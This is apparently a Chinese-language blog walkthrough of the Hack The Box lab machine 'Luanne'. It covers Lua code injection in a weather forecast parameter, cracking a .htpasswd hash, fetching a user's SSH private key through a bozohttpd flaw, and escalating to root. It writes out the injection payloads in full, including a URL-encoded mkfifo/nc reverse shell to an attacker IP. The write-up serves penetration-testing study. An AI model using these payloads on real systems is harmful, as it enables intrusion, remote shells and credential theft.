Hack The Box——Luanne

最新推荐文章于 2024-06-08 17:21:42 发布
最新推荐文章于 2024-06-08 17:21:42 发布
阅读量1.8w 收藏 2
点赞数 1
分类专栏: HackTheBox靶机 文章标签: Hack The Box HTB-Luanne 渗透测试实例
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_32261191/article/details/110739723
版权

目录

简介

信息收集

漏洞发现

Lua代码注入

漏洞利用

权限提升

用户r.michaels的Shell

总结

简介

靶机偏CTF类型,评分才2.3,评分这么低是有原因的。总体思路是通过lua代码注入获得WebShell,然后利用CVE-2010-2320读取普通用户ssh私钥文件,从而获得普通用户权限,最后通过解密enc文件,利用.htpasswd文件中的密码获得root权限。

信息收集

使用Nmap对目标主机进行端口扫描及服务识别,发现目标主机开启22、80和9001端口,且80和9001端口的web服务都需要经过认证,80端口的robots.txt文件中包含weather目录,目标主机运行着NetBSD操作系统,如图:

访问80端口,需要认证,如图:

尝试常见弱口令未认证成功,取消之后发现目标主机本地开启3000端口,如图:

查看robots.txt文件,果然存在weather目录,如图:

访问9001端口的web服务,同样需要认证,如图:

使用Google搜索9001端口的medusa httpd漏洞发现Supervisor远程代码执行漏洞,但是未利用成功,如图:

扫描网站目录及文件,在80端口web服务的weather目录下发现forecast目录,如图:

访问该目录提示需要传递参数city参数,如图:

传递参数后发现一些城市列表,如图:

使用Burp进行Fuzz时发现报错,如图:

但是并不存在SQL注入漏洞。 

漏洞发现

Lua代码注入

使用Google搜索lua相关漏洞发现:Lua Web应用程序安全漏洞,尝试其中的漏洞发现测试代码注入时返回内容少了花括号,如图:

换成print函数后成功执行,如图:

构造payload:Leeds%27)%20os.execute(%27id%27)--,成功执行命令,如图:

漏洞利用

构造反弹shell的payload:Leeds%27)%20os.execute(%27rm+%2ftmp%2ffa%3bmkfifo+%2ftmp%2ffa%3bcat+%2ftmp%2ffa%7c%2fbin%2fsh+-i+2>%261%7cnc+10.10.14.44+443+>%2ftmp%2ffa%3b%27)--,成功反弹shell,如图:

权限提升

查看/etc/passwd文件发现普通用户r.michaels用户等,如图:

在.htpasswd文件中发现用户凭据:webapi_user:$1$vVoNCsOl$lMtBS6GL2upDbR4Owhzyc0,如图:

解密后获得密码,如图:

使用webapi_user/iamthebest可以登录80端口的web服务,如图:

但无法登录9001端口的web服务,尝试撞库其它用户未成功。使用提权辅助脚本发现一些配置文件及ssh配置策略允许root用户通过ssh登录,如图:

查看/etc/supervisord.conf发现9001端口web服务用户名和密码,如图:

登录之后如图:

搜索该版本漏洞未发现可获得shell的漏洞。使用curl查看3000端口信息,发现需要认证,使用之前解密的信息认证成功,但和80端口的web服务一样,查看响应头发现Server为bozohttpd,如图:

用户r.michaels的Shell

搜索发现bozohttpd组件存在CVE-2015-8212,CVE-2014-5015,CVE-2010-2320,但是都没有漏洞利用脚本。文章:https://www.anquanke.com/vul/id/1178769描述可以借助以"/~"序列开头的多个URIs请求获取主目录列表内容,但不知道怎么用。在论坛https://raidforums.com/Thread-Tutorial-Luanne-Tutorial-Discussion?page=2发现自己忽略了日志中的3001端口相关信息,成功被作者忽悠,如图:

然后使用大佬们提示的方法:curl --user webapi_user:iamthebest http://127.0.0.1:3001/~r.michaels/id_rsa获取用户的私钥内容,这里脑洞不够大,没想到id_rsa文件的路径没在.ssh目录下,如图:

将私钥内容保存到本地,使用ssh连接成功获得普通用户权限,如图:

由于在ksh中,因此无法执行bash版本的提权辅助脚本。在backups目录下发现enc文件,如图:

查看/var/mail/r.michaels未获得密码等信息。使用openssl命令和webapi_user的密码未解密成功,使用uudecoded也未解码成功。查看论坛大佬的提示,使用netpgp命令解密enc文件,然后解压文件发现.htpasswd文件中的Hash值,如图:

解密Hash值,如图:

使用该密码获得root权限的Shell,如图:

总结

靶机评分2.3,是大家公认比较差的靶机,在普通用户Shell那里由于不知道CVE-2010-2320怎么用卡了很久,在解密enc文件那里寻找密码浪费了不少时间,属实不是啥好靶机。

江左盟宗主
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
Hack The Box】Linux练习-- Luanne
人间体佐菲的博客
11-27 551
Hack The Box】Linux练习-- Luanne
Hack The Box,一款有意思的渗透测试平台
m0_60571990的博客
11-28 6474
Hack The Box,一款有意思的渗透测试平台
HackTheBox(黑客盒子)基础模块速通Responder篇
最新发布
轻舟已过万重山
06-08 1243
Responder是HackTheBox平台上的一个基础模块,用于嗅探网络中的NTLMv1/v2认证请求,并进行中间人攻击。本篇文章将介绍Responder的基本用法和一些常用技巧。
HackTheBox靶场系列(一)之HackTheBox靶场简介
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
11-30 3177
Hack The Box是国外的一个网络安全在线平台,允许用户实践渗透测试技能,并与其他类似兴趣的成员交流想法和方法。它包含一些不断更新的挑战,其中有许多模拟真实场景的机器。HackTheBox靶场是一个虚拟的渗透测试训练平台,用于帮助安全研究人员、渗透测试人员和学生提高他们的技能。它包含一系列的虚拟机,其中每一个虚拟机都代表一个可攻击的目标系统。通过攻击这些虚拟机和解决它们的漏洞,用户可以提高自己的技能和知识,以更好地了解实际环境中的攻击和防御。
Hackthebox入门
热门推荐
DTSknanLP的博客
02-28 2万+
Hackthebox-Paper
Altera新的MAX IIZ CPLD在便携式应用中实现了零功耗
01-19
MAX IIZ器件为业界的CPLD系列增加了零功耗和超小型封装型号,使手持式设备和其他便携式应用能够充分发挥CPLD的诸多优势——包括灵活性、产品快速面市以及电路板级集成等。  Altera公司低成本产品行销总监Luanne ...
Altera发售全线65nm Cyclone III FPGA
01-19
 Altera公司低成本产品营销总监Luanne Schirrmeister评论说:“作为业界首款也是一款65-nm低成本FPGA系列,Cyclone III器件在数字系统设计中前所未有地同时实现了高密度、低功耗和低成本。而当今FPGA设计人员需要的...
EDA/PLD中的Altera发布具有安全特性的低功耗新系列Cyclone III LS FPGA
11-11
Altera公司元器件产品营销资深总监Luanne Schirrmeister的言论表明,Cyclone系列的成功在于贴近客户需求,提供定制化的低功耗、高性能和小巧尺寸的解决方案。Cyclone III LS器件的发布进一步强化了Altera在低功耗...
EDA/PLD中的Altera发售全线65nm Cyclone III FPGA
11-25
Altera的低成本产品营销总监Luanne Schirrmeister强调,Cyclone III系列是业界首个也是唯一的65纳米低成本FPGA系列,它在提供高密度、低功耗的同时,也保持了经济性。这一特性对于设计者来说极具吸引力,因为他们...
EDA/PLD中的Altera公司宣布开始提供 II GX FPGA开发套件
11-11
Altera公司的元器件产品营销资深总监Luanne Schirrmeister强调,Arria II GX开发套件让设计师能够快速评估FPGA,并且能迅速将设计理念转化为实际产品。这个套件包含了许多高性能特性,利用这些特性,用户可以在各种...
Hack The Box真实靶机环境搭建教程
大河之犬的博客
05-23 1967
应该是连接VPN走的端口,既然我们是在中国,还是选择UDP这种无连接的协议比较好。然后就可以下载VPN配置文件了。接下来,这里有欧洲和美国两个地区,每个地区只有一个服务节点,选择自己的VPN对应的节点。
Hack The Box 玩转指南:初学者到高手的渗透测试之旅》
2201_75353421的博客
01-30 1620
Hack The Box 实战指南:从注册到成功通关的渗透测试之旅》介绍了在Hack The Box平台上进行渗透测试的全过程。从注册开始,通过连接实验室、生成自己的服务器,一直到成功通关的每一步都得到详细解说。这是一篇适合初学者的实用指南,旨在帮助读者提高渗透测试技能和实际操作经验。
Hack The Box靶场使用流程及方法
z875611510的博客
06-09 3943
协议有两个:UDP1337、TCP443,应该是连接VPN走的端口,既然我们是在中国,还是选择UDP这种无连接的协议比较好。国内视频介绍(kali连接htb):https://www.bilibili.com/video/BV1Q94y1f73u。以上就是hackthebox靶场的使用和第一关详解,总的来说这个靶场还是基础的,里面的资源也比较丰富,适合安全初学者入门。登录我们的HTB账号,点击右上角的“CONNECT TO HTB”,上面有两个选项,这里选择入门的就行。
入坑 Hack The Box
LainWith的博客
10-19 1万+
视频介绍:https://www.bilibili.com/video/BV17T4y1i7Uh 官方文档:https://help.hackthebox.com/en/articles/5185158-introduction-to-hack-the-box个人感觉前者偏向实战一些,后者偏向练习题一些。更详细的区别,参见: https://hacktalk.net/hacking-the-box-htb-vs-vulnhub/过去注册HTB的时候,需要拿到邀请码才行,类似下面视频这种,但是现在你不需要邀请
HackTheBox 如何使用
网络安全学习
04-14 4624
如何开始? 1.到官网注册一个账号 https://www.hackthebox.com/ 2.验证自己的邮箱 3.下载 openvpn 4.到左边的 labs 实验室开始学习或直接点击 start point 5.点击想要完成的靶机,比如第 0 层的第一个靶机,选择 connnect to htb 选择 openvpn 会自动下载 openvpn 的文件,然后用 openvpn 导入,稍等一下即可连接 在 kali(linux)中如何连接? 同样是执行下载的文件 ┌──(root💀kali)-[~/d
hack the box 注册时全名无效、reCapcha validation等注册问题
weixin_68177269的博客
03-12 4003
本篇文章主要记述了在注册hack the box时候遇到的问题及其解决办法。同样可以应用在注册其他外网的情况下。
hackthebox注册教程
shy的博客
02-01 1万+
官方网址:https://www.hackthebox.eu/ hackthebox是一个靶场,听说和vulnhub很像,最近迷上了做靶场,于是就像去hackthebox看看,发现还是注册,而且注册好像还没有那么简单 在首页的最下面有个join,进行点击 发现需要邀请码,上网搜了搜,发现邀请码得靠自己获取,好吧,我接受这个挑战。 使用view-source:https://www....
第一章 网络安全从实战入门 hack the box
qq_42676415的博客
04-24 629
这会下载一个后缀为ovpn的文件,这个文件就是链接hack the box 的网络文件。(3)输入openvpn (路径)文件名,然后回车开始链接hack the box 的网络。二、我们使用kali系统,这个可以安装虚拟机,网络上教程一大堆,不在手把手教。(不会安装,不知道如何在官网下载的可以私信我)(2)输入sudo -I 命令切换为超级管理员用户。我们利用hack the box 进行教学,官方网址。在终端显示如下后,刷新网页如下右边就是链接成功。三、链接hack the box 的网络。
HackTheBox配置详解
2301_78325931的博客
06-02 381
2023HackTheBox配置一次过

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值